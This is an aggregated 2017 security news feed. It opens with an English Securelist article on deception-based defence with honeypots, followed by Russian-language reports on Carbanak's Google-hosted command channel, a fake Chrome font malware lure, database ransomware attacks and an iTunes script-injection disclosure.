    Interactivity is a security system feature that implies interaction with the attacker and their tools as well as an impact on the attack scenario depending on the attacker’s actions. For example, introducing junk search results to confuse the vulnerability scanners used by cybercriminals is interactive. As well as causing problems for the cybercriminals and their tools, these methods have long been used by researchers to obtain information about the fraudsters and their goals.

    There is a fairly clear distinction between interactive and “offensive” protection methods. The former imply interaction with attackers in order to detect them inside the protected infrastructure, divert their attention and lead them down the wrong track. The latter may include all the above plus exploitation of vulnerabilities on the attackers’ own resources (so-called “hacking-back”). Hacking-back is not only against the law in many countries (unless the defending side is a state organization carrying out law enforcement activities) it may also endanger third parties, such as users’ computers compromised by cybercriminals.

    The use of interactive protection methods that don’t break the law and that can be used in an organization’s existing IT security processes make it possible not only to discover if there is an intruder inside the infrastructure but also to create a threat profile.

    One such approach is Threat Deception – a set of methods, specialized solutions and processes that have long been used by researchers to analyze threats. In our opinion, this approach can also be used to protect valuable data inside the corporate network from targeted attacks.

    Characteristics of targeted attacks

    Despite the abundance of technology and specialized solutions to protect corporate networks, information security incidents continue to occur even in large organizations that invest lots of money to secure their information systems.

    Part of the reason for these incidents is the fact that the architecture of automated security solutions, based on identifying patterns in general traffic flows or monitoring a huge number of endpoints, will sooner or later fail to recognize an unknown threat or a criminal stealing valuable data from the infrastructure. This may occur, for example, if the attacker has studied the specific features of a corporate security system in advance and identified a way of stealing valuable data that will go unnoticed by security solutions and will be lost among the legitimate operations of other users.

    nother reason is the fact that APT attacks differ from other types of attacks: in terms of target selection and pinpoint execution, they are similar to surgical strikes, rather than the blanket bombing of mass attacks.

    The organizers of targeted attacks carefully study the targeted infrastructure, identifying gaps in configuration and vulnerabilities that can be exploited during an attack. With the right budget, an attacker can even deploy the products and solutions that are installed in the targeted corporate network on a testbed. Any vulnerabilities or flaws identified in the configuration may be unique to a specific victim.

    This allows cybercriminals to go undetected on the network and steal valuable data for long periods of time.

    To protect against an APT, it is necessary not only to combat the attacker’s tools (utilities to analyze security status, malicious code, etc.) but to use specific behavioral traits on the corporate network to promptly detect their presence and prevent any negative consequences that may arise from their actions. Despite the fact that the attacker usually has enough funds to thoroughly examine the victim’s corporate network, the defending side still has the main advantage – full physical access to its network resources. And it can use this to create its own rules on its own territory for hiding valuable data and detecting an intruder.

    After all, “locks only keep an honest person honest,” but with a motivated cybercriminal a lock alone is not enough – a watchdog is required to notify the owner about a thief before he has time to steal something.

    Interactive games with an attacker

    In our opinion, in addition to the obligatory conventional methods and technologies to protect valuable corporate information, the defensive side needs to build interactive security systems in order to get new sources of information about the attacker who, for one reason or another, has been detected inside the protected corporate network.

    Interactivity in a security system implies a reaction to the attacker’s actions. That reaction, for instance, may be the inclusion of the attacker’s resources to a black list (e.g. the IP address of the workstations from which the attack is carried out) or the isolation of compromised workstations from other network resources. An attacker who is looking for valuable data within a corporate network may be deliberately misled, or the tools used by the attacker, such as vulnerability scanners, could be tricked into leading them in the wrong direction.

    Let’s assume that the defending side has figured out all the possible scenarios where the corporate network can be compromised and sets traps on the protected resource:

    How can these traps help?

    Below is a simple scenario showing how a resource with no special security measures can be compromised:

  • The attacker uses a vulnerability scanner to find a vulnerability on the server side of the protected infrastructure, for example, the ability to perform an SQL injection in a web application.
  • The attacker successfully exploits this vulnerability on the server side and gains access to the closed zone of the web resource (the administration panel).
  • The attacker uses the gained privileges to study the inventory of available resources, finds documents intended for internal use only and downloads them.
  • Let’s consider the same scenario in the context of a corporate network where the valuable data is protected using an interactive system:

  • The attacker searches for vulnerabilities on the server side of the protected infrastructure using automated means (vulnerability scanner and directory scanner). Because the defending side has pre-deployed a special tool to deceive scanning tools, the attacker has to spend time analyzing the scan results, after which the attacker finds a vulnerability – the trap on the server side of the protected infrastructure.
  • The attacker successfully exploits the detected vulnerability and gains access to the closed zone of the web resource (the administration panel). The attempt to exploit the vulnerability is recorded in the log file, and a notification is sent to the security service team.
  • The attacker uses the gained privileges to study the inventory of available resources, finds the fake documents and downloads them.
  • The downloaded documents contain scripts that call the servers controlled by the defending side. The parameters of the call (source of the request, time, etc.) are recorded in the log file. This information can then be used for attacker attribution (what type of information they are interested in, where the workstations used in the attack are located, the subnets, etc.) and to investigate the incident.
  • Detecting an attack by deceiving the attacker

    Currently, in order to strengthen protection of corporate networks the so-called Threat Deception approach is used. The term ‘deception’ comes from the military sphere, where it refers to a combination of measures aimed at misleading the enemy about one’s presence, location, actions and intentions. In IT security, the objective of this interactive system of protection is to detect an intruder inside the corporate network, identifying their attributes and ultimately removing them from the protected infrastructure.

    The threat deception approach involves the implementation of interactive protection systems based on the deployment of traps (honeypots) in the corporate network and exploiting specific features of the attacker’s behavior. In most cases, honeypots are set to divert the attacker’s attention from the truly valuable corporate resources (servers, workstations, databases, files, etc.). The use of traps also makes it possible to get information about any interaction between the attacker and the resource (the time interactions occur; types of data attracting the attacker’s attention, toolset used by the attacker, etc.).

    However, it’s often the case that a poorly deployed trap inside a corporate network will not only be successfully detected and bypassed by the attackers but can serve as an entry point to genuine workstations and servers containing valuable information.

    interactive_security_01

    Incorrect implementation of a honeypot in the corporate network can be likened to building a small house next to a larger building containing valuable data. The smaller house is unlikely to divert the attention of the attacker; they will know where the valuable information is and where to look for the “key” to access it.

    Simply installing and configuring honeypots is not enough to effectively combat cybercriminals; a more nuanced approach to developing scenarios to detect targeted attacks is required. At the very least, it is necessary to carry out an expert evaluation of the attacker’s potential actions, to set honeypots so that the attacker cannot determine which resources (workstations, files on workstations and servers, etc.) are traps and which are not, and to have a plan for dealing with the detected activity.

    interactive_security_02

    Correct implementation of traps and a rapid response to any events related to them make it possible to build an infrastructure where almost any attacker will lose their way (fail to find the protected information and reveal their presence).

    Forewarned is forearmed

    Getting information about a cybercriminal in the corporate network enables the defending side to take measures to protect their valuable data and eliminate the threat:

    Conclusion

    The attacker has an advantage over the defender, because they have the ability to thoroughly examine their victim before carrying out an attack. The victim doesn’t know where the attack will come from or what the attacker is interested in, and so has to protect against all possible attack scenarios, which requires a significant amount of time and resources.

    Implementation of the Threat Deception approach gives the defending side an additional source of information on threats thanks to resource traps. The approach also minimizes the advantage enjoyed by the attacker due to both the early detection of their activity and the information obtained about their profile that enables timely measures to be taken to protect valuable data. It is not necessary to use prohibited “offensive security” methods, which could make the situation worse for the defending side if law enforcement agencies get involved in investigating the incident.

    Interactive security measures that are based on deceiving the attacker will only gain in popularity as the number of incidents in the corporate and public sector increases. Soon, systems based on the Threat Deception approach will become not just a tool of the researchers but an integral part of a protected infrastructure and yet another source of information about incidents for security services.

    If you’re interested in implementing the Threat Deception concept described in the post on your corporate network, please complete the form below:

    jQuery(document).bind('gform_post_render', function(event, formId, currentPage){if(formId == 13) {} } );jQuery(document).bind('gform_post_conditional_logic', function(event, formId, fields, isInit){} ); jQuery(document).ready(function(){jQuery(document).trigger('gform_post_render', [13, 1]) } );

    orig: 2017-01-19 10:32:35 / https://securelist.com/blog/security-policies/76367/deceive-in-order-to-detect/ (click post title)



    Троян Carbanak использует сервисы Google в качестве C&C-серверов

    Группировка Carbanak продолжает искать новые техники для уклонения от обнаружения.

    Новые модификации вредоносного ПО Carbanak используют ряд сервисов Google (Google Apps Script, Google Sheets и Google Forms) для хостинга своей C&C-инфраструктуры, сообщают эксперты компании Forcepoint Security Labs.

    По данным исследователей, злоумышленники рассылают спам-сообщения с прикрепленным вредоносным RTF-документом, содержащим OLE объект с файлом VBScript. При открытии документа пользователям предлагается разблокировать контент двойным щелчком мыши. После осуществления данного действия на экране отображается диалоговое окно для запуска unprotected.vbe, однако в действительности на компьютер будет загружен банковский троян Carbanak.

    Предыдущие версии Carbanak связывались с C&C-сервером для получения дальнейших указаний и отправляли похищенную информацию на другой web- или FTP-сервер. Однако новая модификация действует иначе. Оказавшись на системе, вредонос генерирует уникальный идентификатор для каждой жертвы, а затем пингует Google Apps Script, сообщая ID инфицированного компьютера. Google Apps Script предоставляет вредоносу URL Google Spreadsheet и Google Forms, которые нужно использовать для данной жертвы. В Google Spreadsheet хранится конфигурация и команды, которые вредоносная программа должна выполнить, а Google Forms используется для выгрузки похищенной информации.


    Исследователи Forcepoint совместно с Google уже ведут работу по прекращению операции Carbanak. Группировка Carbanak продолжает искать новые техники для уклонения от обнаружения. Эксплуатация Google в качестве независимого C&C-канала, вероятнее всего, будет более действенным методом, чем использование свежесозданных доменов или доменов без репутации, отмечают эксперты.

    orig: 2017-01-19 10:32:15 / http://www.securitylab.ru/news/485074.php (click post title)



    Google раскрыл подробности обеспечения безопасности в своей инфраструкту

    Компания Googleinfo-icon опубликовала обзор мер, предпринимаемых для обеспечения безопасности серверной инфраструктуры. Рассмотрены меры по обеспечению безопасности серверов, сетевой инфраструктуры, использование аутентификации.  

    Некоторые интересные особенности:

     

     

    orig: 2017-01-19 10:08:13 / https://www.anti-malware.ru/news/2017-01-19/21903 (click post title)



    Google раскрыл подробности обеспечения безопасности своей инфраструктуры

    Компания Googleinfo-icon опубликовала обзор мер, предпринимаемых для обеспечения безопасности серверной инфраструктуры. Рассмотрены меры по обеспечению безопасности серверов, сетевой инфраструктуры, использование аутентификации.  

    Некоторые интересные особенности:

     

     

    orig: 2017-01-19 10:08:13 / https://www.anti-malware.ru/news/2017-01-20/21903 (click post title)



    Proofpoint: Обнаружена новая атака на пользователей браузера Chrome

    Исследователи в области безопасности Proofpointinfo-icon предупреждают, что недавно была замечена кампания по распространению вредоносных программ, ориентированная на пользователей браузера Chrome на компьютерах на базе Windows.

    Новый вид атаки был замечен экспертами в декабре, когда они обнаружили, что один из взломанных сайтов пытается загрузить файл Chrome_Font.exe на компьютер пользователей. Сайт, который обнаружили исследователи Proofpoint был скомпрометирован небезызвестной цепочки EITest. Стало быть, он пытался загрузить файл на компьютеры жертв только после запуска ряда механизмов фильтрации.

    Как выяснили эксперты, злоумышленники таким образом атакуют пользователей браузера Chrome на операционных системах Windows. Как только пользователь заходит на вредоносный сайт, используя этот браузер, скрипт, внедренный в страницу делает текст нечитаемым и пользователю отображается уведомление, предлагающее скачать и установить новые шрифты для корректного отображения.

    «Схема заражения довольно проста: если пользователь отвечает определенным критериям (User-Agent, страна, из которой пользователь, т.п.) скрипт встраивается в страницу скомпрометированного сайта и видоизменяет ее. Цель заключается в том, чтобы заставить пользователя скачать и установить якобы шрифты для правильного отображения страницы» - объясняет эксперт Proofpoint.

    Исследователи также обнаружили, что скомпрометированные сайты будут пытаться заразить и пользователей Internet Explorer, но только более стандартным методом, через набор эксплоитов.

    Атака на пользователей Chrome использует хранение всех данных между HTML-тегов в массиве, затем заменяя их на “&#0”. Так как неверный символ ISO, браузер будет отображать вместо него «кракозябры».

    Пользователям отображается уведомление о том, что не хватает шрифта «HoeflerText» (такое название было при анализе атаки экспертами Proofpoint). Также пользователям говорится, что они должны немедленно установить этот шрифт. Уведомление нельзя закрыть с помощью кнопки «x», а вредоносная программа начнет выполняться сразу после того, как пользователь согласиться установить шрифт.

    Proofpoint предполагает, что кампания началась 10 декабря 2016 года, файл Chrome_Font.exe детектируется как Fleercivet.

    orig: 2017-01-19 10:07:14 / https://www.anti-malware.ru/news/2017-01-19/21902 (click post title)



    Миллиардер Росс считает ошибкой США передачу контроля за интернетом

    Росс готов рассмотреть предложения по исправлению ситуации, если таковые появятся.

    Миллиардер Уилбур Росс, выдвинутый избранным президентом США Дональдом Трампом на пост министра торговли, считает, что американские власти приняли неверное решение, допустив передачу контроля над интернетом от США мировому сообществу. Росс готов рассмотреть предложения по исправлению ситуации, если таковые появятся. Об этом сообщает «РИА Новости» со ссылкой на заявление миллиардера в сенате.

    Данное заявление Росс сделал в ответ на вопрос сенатора от штата Техас Теда Круза, выразившего обеспокоенность тем, что в управлении интернетом будут принимать участие такие страны как Иран, Китай и Россия.

    Напомним, 1 октября 2016 года истек срок действия договора между Министерством торговли США и корпорацией по управлению доменными именами и IP-адресами ICANN. Таким образом функция управления адресным пространством Интернета перешла к общественной международной организации.

    orig: 2017-01-19 09:33:37 / http://www.securitylab.ru/news/485073.php (click post title)



    ESET: мошенники в WhatsApp раздают бесплатный интернет

    ESET предупреждает о новой афере, нацеленной на пользователей WhatsApp. Мошенники обещают приложение для «бесплатного интернета без Wi-Fi».  Потенциальная жертва получает сообщение в группе или от пользователя WhatsApp из списка контактов.

    Ей предлагают перейти по ссылке, чтобы подключиться к бесплатному интернету без использования Wi-Fi. Технически невозможно, но неопытным пользователям идея может показаться привлекательной. 

    Если пользователь кликает по ссылке, фишинговая страница определяет язык, установленный для мобильного устройства, и показывает локализованный контент. Пока мошенники используют английский и испанский языки, но ничто не мешает им переключиться на другую аудиторию. 

    Жертву просят поделиться ссылкой на «приложение для бесплатного интернета», как минимум, с 13 пользователями или пятью группами WhatsApp. Так осуществляется дальнейшее распространение фишинговой ссылки. 

     

     

    Чтобы убедить жертву, мошенники приводят на фишинговой странице «комментарии Facebook-пользователей». Поддельные, конечно, – таких аккаунтов не существует.

    Поделившись ссылкой, пользователь пытается подключиться к обещанному бесплатному интернету, скачав «революционное приложение». Как правило, это заканчивается кражей персональной информации, включая данные банковских карт, и подпиской на дорогостоящие SMS-сервисы.

    ESET рекомендует игнорировать подобные предложения и предупреждать об опасности знакомых пользователей, попавшихся на удочку мошенников. 

    orig: 2017-01-19 09:15:10 / https://www.anti-malware.ru/news/2017-01-19/21901 (click post title)



    В Барселоне задержан житель Таганрога по обвинению в хакерстве

    Предоставить причины задержания испанская сторона не смогла.

    Сотрудники ФБР и Интерпола задержали в Барселоне российского программиста Станислава Лисова по обвинению в киберпреступной деятельности. Как сообщает RT со ссылкой на супругу арестованного Дарью, их семья проживает в Таганроге и в Испании находилась на отдыхе.

    По словам женщины, арест был произведен неожиданно, когда они с мужем выходили из автомобиля. К паре подошли двое полицейских, предъявили удостоверения, сообщили о задержании и стали проверять находившиеся при Лисове электронные устройства. Согласно заявлению Лисовой, ее супруг занимается созданием и поддержкой сайтов.

    Арест состоялся 13 января текущего года, и в настоящее время Лисов находится в тюрьме Brians в Мартореле (Испания). Официальные обвинения россиянину предъявлены не были, но испанские власти уведомили о задержании посольство РФ. Данный факт подтвердил пресс-секретарь ведомства Василий Ниорадзе. Причины задержания испанская сторона предоставить не смогла.

    «После получения соответствующей информации сотрудники посольства и генконсульства в Барселоне инициативно установили контакт с испанскими правоохранительными органами в целях защиты интересов российского гражданина и оказания ему необходимой консульской помощи», - заявил Ниорадзе.

    orig: 2017-01-19 07:38:27 / http://www.securitylab.ru/news/485072.php (click post title)



    Столтенберг заявил о росте числа кибератак на системы НАТО

    Ежемесячно на протяжении минувшего года эксперты фиксировали порядка 500 хакерских атак.

    Генеральный секретарь НАТО Йенс Столтенберг обеспокоен стремительным ростом числа хакерских атак на системы Североатлантического альянса. По его словам, в 2016 году количество атак возросло на 60%, передает Die Welt.

    Ежемесячно на протяжении минувшего года эксперты фиксировали порядка 500 хакерских атак, большая часть из которых спонсировалась сторонними государствами.

    «Я чрезвычайно обеспокоен подобным развитием ситуации и киберзащита станет одной из ключевых тем на следующем саммите НАТО», - заявил генсекретарь НАТО.

    Ранее Еврокомиссия также отметила резкий всплеск кибератак на серверы Евросоюза в 2016 году. В частности, было зафиксировано 110 отдельных попыток взлома серверов ЕК, что на 20% превысило показатель 2015 года.

    orig: 2017-01-19 07:36:00 / http://www.securitylab.ru/news/485071.php (click post title)



    Касперский предрек рост числа атак на российские промышленные объекты

    В 2017 году хакеры будут атаковать объекты критической инфраструктуры и производства.  

    В нынешнем году в России ожидается рост числа хакерских атак. Киберпреступники будут атаковать самые разнообразные компьютеризированные устройства, в том числе объекты критической инфраструктуры и производства. Об этом в среду, 18 января, сообщает издание «РИА Новости» со ссылкой на главу «Лаборатории Касперского» Евгения Касперского.

    Как рассказал Касперский в кулуарах Всемирного экономического форума в Давосе, исследователи его компании уже несколько лет подряд наблюдают усиление вредоносной активности в «нетрадиционных сегментах». Речь идет об устройствах «Интернета вещей» (IoT), таких как камеры видеонаблюдения, ставших излюбленной целью хакеров наряду с компьютерами и мобильными телефонами. Напомним, в прошлом году проблема безопасности IoT-устройств всколыхнула общественность после появления опасного ботнета Mirai.

    Отвечая на вопрос о главных киберугрозах в 2017 году, Касперский выразил беспокойство по поводу усиления в России кибератак на промышленные объекты, представляющие собой сложные компьютеризированные системы.

    orig: 2017-01-19 06:51:48 / http://www.securitylab.ru/news/485070.php (click post title)



    Об Ответственности и Возможностях

    ....тот, кто знает врага и знает себя, не окажется в опасности и в ста сражениях. 
    Тот, кто не знает врага, но знает себя, будет то побеждать, то проигрывать. 
    Тот, кто не знает ни врага, ни себя, неизбежно будет разбит в каждом сражении.
    Сунь-цзы. "Искусство войны"

    Ни у кого не вызывает сомнения заключение, что оборона должна соответствовать нападению. Именно поэтому бытовые конфликты в той или иной степени мы способны разрешать самостоятельно, против бандитов-одиночек и организованной преступности у нас есть полиция, для эффективных военный действий - используется армия. Указанные три стратегии обороны характеризуются различными инструментами, применяемыми подходами, глубиной разведки и планирования действий, в общем - сильно разными TTP, следовательно, требуют разного оснащения и обеспечения, прежде чем эффективно и результативно защищаться, и поэтому имеют разные возможности, определяющие их способности и возлагаемую ответственность. Я не раз писал, что профессионалам должны противостоять профессионалы, и дело далеко не полностью определяется исключительно профессионализмом команды, как и эффективность военный действий не определяется исключительно способностью каждого солдата метко стрелять, быстро и незаметно перемещаться и т.п. Здесь нужна целая система взаимосвязанных мероприятий, позволяющая к моменту начала боя полностью знать противника: его цели, тактику и стратегию, применяемые инструменты, в общем, опять ТТР. Понятно, что наши противники имеют достаточно методов и средств, чтобы не делиться с нами своими ТТР, а поэтому нам нужны возможности эти сведения доставать, поскольку без знания противника ему невозможно противостоять. Именно поэтому полиция, не имея поддержки ФСБ, СВР, ГРУ не может противостоять организованным вооруженным силам, и тем более неэффективны гражданские - сколько не было бы отважным народное ополчение, при прочих равных условиях без грамотного руководства (а мы знаем из истории и даже художественной литературы, что эффективные народные ополчения возглавлялись профессиональными военными) оно не сможет противостоять регулярной армии.

    Вроде как бы все очевидно, да? Однако почему в области кибербезопасности мы думаем иначе? Сколько ни был бы профессиональным безопасник или целое подразделение копрбезопасности, почему есть полная уверенность, что он способен противостоять киберармии (APT-кампаниям), и что в его ответственности лежит не допустить компрометации? А разве он имеет возможности, для обеспечения этой ответственности? Он имеет возможность провести глубокую разведку противника (== исследовать группировки, организующие APT-кампании)? Он имеет возможность реверсить применяемые противником инструменты/оружие, чтобы выковыривать оттуда информацию о других инструментах и инфраструктуре и придумывать что с этим можно поделать? Он смотрит на вопрос широко (== видит больше своей сети)? Едва ли он имеет многолетний опыт (== критерий профессионализма) таких исследований (давно ли мы заговорили об целевых атака?), позволяющий ему прогнозировать действия противников и производить безошибочную атрибутику. 

    Я не вижу ничего особенного в том, что корпоративная безопасность зачастую не может эффективно противостоять целевым атакам - это всего лишь подтверждает мой старый тезис что профессионалам должны противостоять профессионалы с аналогичным обеспечением и возможностями. Поэтому не стоит по этому поводу сокрушаться, ибо для достижения лучшей результативности надо усиливать свои сильные стороны, а не подтягивать свои слабые - не надо бросаться в исследования атак, форенсику и реверс ВПО, - едва ли получится это делать лучше специализированных компаний, делающих это более 20 лет, но надо усиливать те направления, где никто вам не помощник: понимать ваши бизнес-процессы и циркулирующую там информацию, где в них ценность как для потенциального атакующего, так и для вашего бизнеса, что не получится защитить техническими контролями и что с этим можно поделать и т.п. Только так, дополнив "знание себя" аутсорсингом того, кто "знает врага", можно построить действительно эффективную оборону!

    orig: 2017-01-19 06:38:00 / http://reply-to-all.blogspot.com/2017/01/blog-post.html (click post title)



    Ассанж не согласен на экстрадицию в США, несмотря на помилование Мэннинг

    По словам адвоката Ассанжа, президент США не в полной мере выполнил требования его подзащитного.  

    Несмотря на помилование главного информатора WikiLeaks Челси Мэннинг (Chelsea Manning), основатель ресурса Джулиан Ассанж не согласен на экстрадицию в США. Напомним, ранее Ассанж неоднократно заявлял в Twitter, что согласится на заключение в американской тюрьме, если Мэннинг будет освобождена. В последние дни своего пребывания на посту президента США Барак Обама помиловал информатора, и 17 мая текущего года она выйдет на свободу.

    По словам адвоката Ассанжа Барри Поллака (Barry Pollack), его подзащитный не согласен на экстрадицию, поскольку помилование Мэннинг не удовлетворяет требования Ассанжа в полной мере. «Мистер Ассанж очень рад, что наказание для мисс Мэннинг было смягчено и в мае она выйдет на свободу. Однако это лишь малая часть того, чего он добивался. Мистер Ассанж призывал помиловать Челси Мэннинг и выпустить ее немедленно», - сообщил Поллак изданию The Hill.

    В настоящее время Джулиан Ассанж скрывается в посольстве Эквадора в Лондоне от властей Швеции, где ему были предъявлены обвинения в изнасиловании. В США ему не было предъявлено никаких обвинений, однако, по мнению адвокатов, американские власти могли вынести обвинение тайно в целях предотвратить возможный побег.

    Челси Мэннинг (до 2015 года – Брэдли Мэннинг) является информатором созданного Ассанжем портала WikiLeaks. В 2010 году, будучи военнослужащим США, Мэннинг передала порталу для публикации большой объем секретных документов, связанных с военными действиями в Ираке и Афганистане.

    Как сообщили представители Белого дома, помилование Мэннинг никак не связано с опубликованными в Twitter обещаниями Ассанжа.

    orig: 2017-01-19 06:02:52 / http://www.securitylab.ru/news/485068.php (click post title)



    CouchDB и Hadoop стали новыми объектами атак вымогателей

    Инциденты произошли после волны атак на серверы MongoDB и ElasticSearch в январе нынешнего года.

    На прошлой неделе неизвестные злоумышленники атаковали некоторые базы данных CouchDB и Hadoop. В основном преступники делали это в целях получения выкупа за возвращение украденных файлов, однако в некоторых случаях злоумышленники уничтожали данные просто «ради смеха».

    Инциденты произошли после волны атак на серверы MongoDB в начале января нынешнего года. Тогда эксперты полагали, что под прицел киберпреступников могут попасть и другие серверы баз данных. Спустя неделю прогнозы специалистов подтвердились - в результате хакерской атаки пострадали кластерные серверы ElasticSearch. В результате серии атак были скомпрометированы свыше 34 тыс. серверов MongoDB и 4,6 тыс. кластеров ElasticSearch.

    Как пояснили в интервью ресурсу BleepingComputer исследователи Виктор Геверс (Victor Gevers) и Ниалл Мерриган (Niall Merrigan), начиная с 12 января некто под псевдонимом NODATA4U компрометировал серверы Hadoop и удалял все данные, вставляя в строки таблицы нелицеприятную фразу NODATA4U_SECUREYOURSHIT. На момент написания новости было обнаружено 124 таких сервера.

    Странность заключается в том, что злоумышленник не требует выкуп за восстановление данных и в целом вся ситуация походит на простой вандализм. Как отметили исследователи, «хулиган» действует достаточно медленно, удаляя один хост в час, хотя все данные таблицы можно удалить за несколько секунд.

    По данным экспертов, 5,4 тыс. экземпляров Hadoop подключены к Интернету, хотя неизвестно, какими из них можно управлять через доступную в Сети панель администрирования.

    Помимо серверов Hadoop, интерес для злоумышленников также представляют базы Apache CouchDB. В отличие от инцидентов с Hadoop, данные атаки преследуют финансовую выгоду. Организатором кампании является группировка r3l4x. Злоумышленники копируют данные из уязвимых БД, удаляют их и требуют выкуп за восстановление информации. По некоторым сведениям, участники r3l4x также скомпрометировали 443 сервера CouchDB. В настоящее время неясно, действительно ли преступники имеют копии удаленных данных или просто «вычищают» информацию и требуют выкуп.

    orig: 2017-01-19 05:58:52 / http://www.securitylab.ru/news/485069.php (click post title)



    Вымогатели взялись за сервера CouchDB и Hadoop

    На прошлой неделе неизвестная группа злоумышленников перехватила управление некоторыми базами данных CouchDB и Hadoop. Главным образом киберпреступники сделали это ради получения выкупа, но в некоторых случаях просто удаляли данные «из вредности».

    Первая волна атак на сервера MongoDB была замечена в начале года, и ИБ-исследователи не сомневались, что другие сервера баз данных также вскоре столкнутся с этой проблемой. Действительно, спустя неделю после первых инцидентов в результате атаки пострадали кластерные сервера ElasticSearch. Всего в результате серии атак были скомпрометированы около 34 тыс. серверов MongoDB и 4,6 тыс. серверов ElasticSearch.

    В нескольких случаях захват баз данных просто был развлечением для кибервандалов, которые удаляли все данные, вставляя нелицеприятное выражение «NODATA4U_SECUREYOURSHIT» во все строки таблицы, которая из-за ошибок в конфигурации оказалась в открытом доступе. NODATA4U в этом случае — никнейм хакера.

    Такая неприятность приключилась со 124 серверами Hadoop. Злоумышленник даже не потребовал выкупа, ограничившись просто хулиганством. Исследователи отметили, что атакующий действует достаточно медленно, удаляя примерно один хост в час, хотя удалить все данные таблицы можно всего за несколько секунд.

    По данным экспертов, 5,4 тыс. инстанций Hadoop подключены к Интернету, хотя невозможно выявить, какими из них можно управлять через доступную в Сети панель администрирования.

    После серверов Hadoop настала очередь баз Apache CouchDB. В отличие от атак Hadoop, совершаемых из хулиганских побуждений, эти атаки имеют явную финансовую мотивацию. Злоумышленники, группировка r3l4x, копируют данные из уязвимых баз, затем «вычищают» их и требуют выкуп за восстановление информации. Пока нет никаких подтверждений, что вымогатели действительно имеют копии удаленных данных. Участники r3l4x уже скомпрометировали 443 сервера CouchDB.

    Два исследователя, первыми заметившие атаки, теперь ведут учет атак на Hadoop и CouchDB в отдельных «Google Таблицах», как и в случае с ElasticSearch и MongoDB. Также эксперты предупредили об опасности GovCERT, а последние опубликовали предупреждения для владельцев потенциально уязвимых серверов. Благодаря усилиям исследователей на выходных многие сервера Hadoop, потенциально попавшие в группу риска, были отключены для проведения превентивных мероприятий по повышению безопасности.

    Тем временем все новые группировки участвуют в атаках на сервера и нацеливаются и на другие виды баз данных. Исследователи отвечают симметрично: теперь проблемой вплотную занимаются пять исследователей, предлагающих помощь жертвам атак. Также стоит отметить, что во многих случаях даже те, кто уплатил выкуп злоумышленникам, так и не вернули свои данные.

    orig: 2017-01-19 05:07:41 / https://threatpost.ru/vymogateli-vzyalis-za-servera-couchdb-i-hadoop/20154/ (click post title)



    Kids and Education

    One of the most effective methods you can use to protect kids online is to talk to them. The younger you start talking to them, and they to you, the better. Hold regular conversations about online safety issues, even going so far as to show them actual negative events that have taken place. If you don't know what your kids are doing, simply ask. Play the clueless parent and ask them to show you what the latest technologies are and how they use them. Quite often, kids love the idea of being the teacher and will open up.

    orig: 2017-01-19 05:00:00 / http://securingthehuman.sans.org/u/5dZ (click post title)



    Пользователям Chrome угрожает новая вредоносная кампания

    Злоумышленники обманом заставляют пользователей загружать вредоносное ПО под видом новых шрифтов.

    Специалисты Proofpoint сообщили о новой вредоносной кампании, направленной на пользователей Chrome для Windows. В ходе операции злоумышленники используют известную цепь компрометации EITest, которая ранее связывалась с атаками с применением различных наборов эксплоитов.

    Новый виток атак был зафиксирован в начале декабря 2016 года. Эксперты заметили, что один из сайтов, скомпрометированных EITest, загружает на компьютеры посетителей файл «Chrome_Font.exe». Как только жертва запускала браузер Chrome, внедренный на страницу код делал текст не читаемым, а на экране отображалось фальшивое уведомление о необходимости загрузки и установки файла, якобы содержащего новые шрифты. Уведомление невозможно закрыть, нажав на «Х», поэтому пользователь вынужден разрешить загрузку файла, который на деле является вредоносным ПО. Как подозревают исследователи, под файлом Chrome_Font.exe скрывается рекламное ПО Fleercivet.

    «Инфицирование происходит просто: если жертва соответствует установленным критериям - целевая страна, корректный User-Agent (Chrome на компьютерах под управлением Windows) и правильный Referer - на страницу внедряется скрипт, переписывающий скомпрометированный web-сайт в браузере потенциальной жертвы. Текст становится нечитаемым, тем самым создавая для пользователя проблему», - пояснил эксперт Proofpoint, известный как Kafeine.

    По словам эксперта, злоумышленники отошли от практики использования эксплоит-паков для доставки вредоносов и сейчас изобретают новые стратегии, в том числе с применением методов социальной инженерии. Так же как в случаях с другими угрозами, преступники эксплуатируют человеческий фактор, обманом вынуждая пользователей загружать и устанавливать вредоносное ПО.

    orig: 2017-01-19 04:52:35 / http://www.securitylab.ru/news/485065.php (click post title)



    iTunes и App Store открыты для внедрения скриптов

    По имеющимся данным, Apple известно о наличии двух уязвимостей в онлайн-службах iTunes и App Store, разработчик уже готовит соответствующий патч. Эти бреши позволяют внедрить вредоносный скрипт в уязвимый модуль или функцию на стороне приложения.

    Проблемы с валидацией входных данных и кодированием email-уведомлений были преданы гласности в минувший понедельник. Автор публикации Бенджамин Межри (Benjamin Kunz Mejri) из Vulnerability Lab уточнил, что эти уязвимости связаны с функцией Notify, реализованной в iTunes и App Store для мобильных устройств, работающих на iOS 10. Эта функция появилась на названных сервисах Apple в сентябре прошлого года, за несколько недель до выхода игры Super Mario Run.

    При формировании исходящего email-уведомления о скором выпуске продукта Notify использует идентификаторы пользователя iCloud или значение devicename. Инициатор атаки может подменить переменную — параметр firstname — скриптом, запускающим полезную нагрузку.

    Причиной возникновения уязвимостей, по мнению Межри, является несовершенство валидации имен (iCloud, devicename) на веб-сервере при отправке email-нотификаций с адреса @new.itunes.com. «Данную уязвимость можно эксплуатировать на iOS-устройствах с ограниченным доступом к входящим сообщениям основного держателя аккаунта, — пишет исследователь. — Ее можно также использовать для массирования спам-рассылок».

    В комментарии Threatpost Межри отметил, что, хотя такие атаки вряд ли получат широкое распространение, они «определенно дают хорошие результаты». Эксплойт постоянной уязвимости валидации входных данных проще, так как он требует лишь наличия аккаунта Apple и «небольшого или умеренного взаимодействия с пользователем». Межри также предупредил, что совместное использование этих багов может повлечь угон сессии, неуемные фишинг-атаки или стойкий редирект на внешние ресурсы.

    О своих находках исследователь сообщил в Apple 15 декабря. Подождав месяц, Vulnerability Lab решилась на публикацию, присовокупив для убедительности PoC-код. «Мы решили раскрыть эту информацию, пока кто-нибудь не начал использовать уязвимости через iTunes», — пояснил Межри. Первый PoC-код, по его словам, Vulnerability Lab создала еще в сентябре, когда Apple только запустила Notify. Убедиться в работоспособности своего эксплойта исследователи смогли лишь в середине декабря, после выпуска Super Mario Run.

    Собеседник Threatpost полагает, что такие проблемы следует решать на стороне сервера, без взаимодействия с конечными пользователями или обновлений. По сведениям Межри, временный патч уже создан, а полноценный появится до конца месяца. Apple на запросы Threatpost пока не ответила.

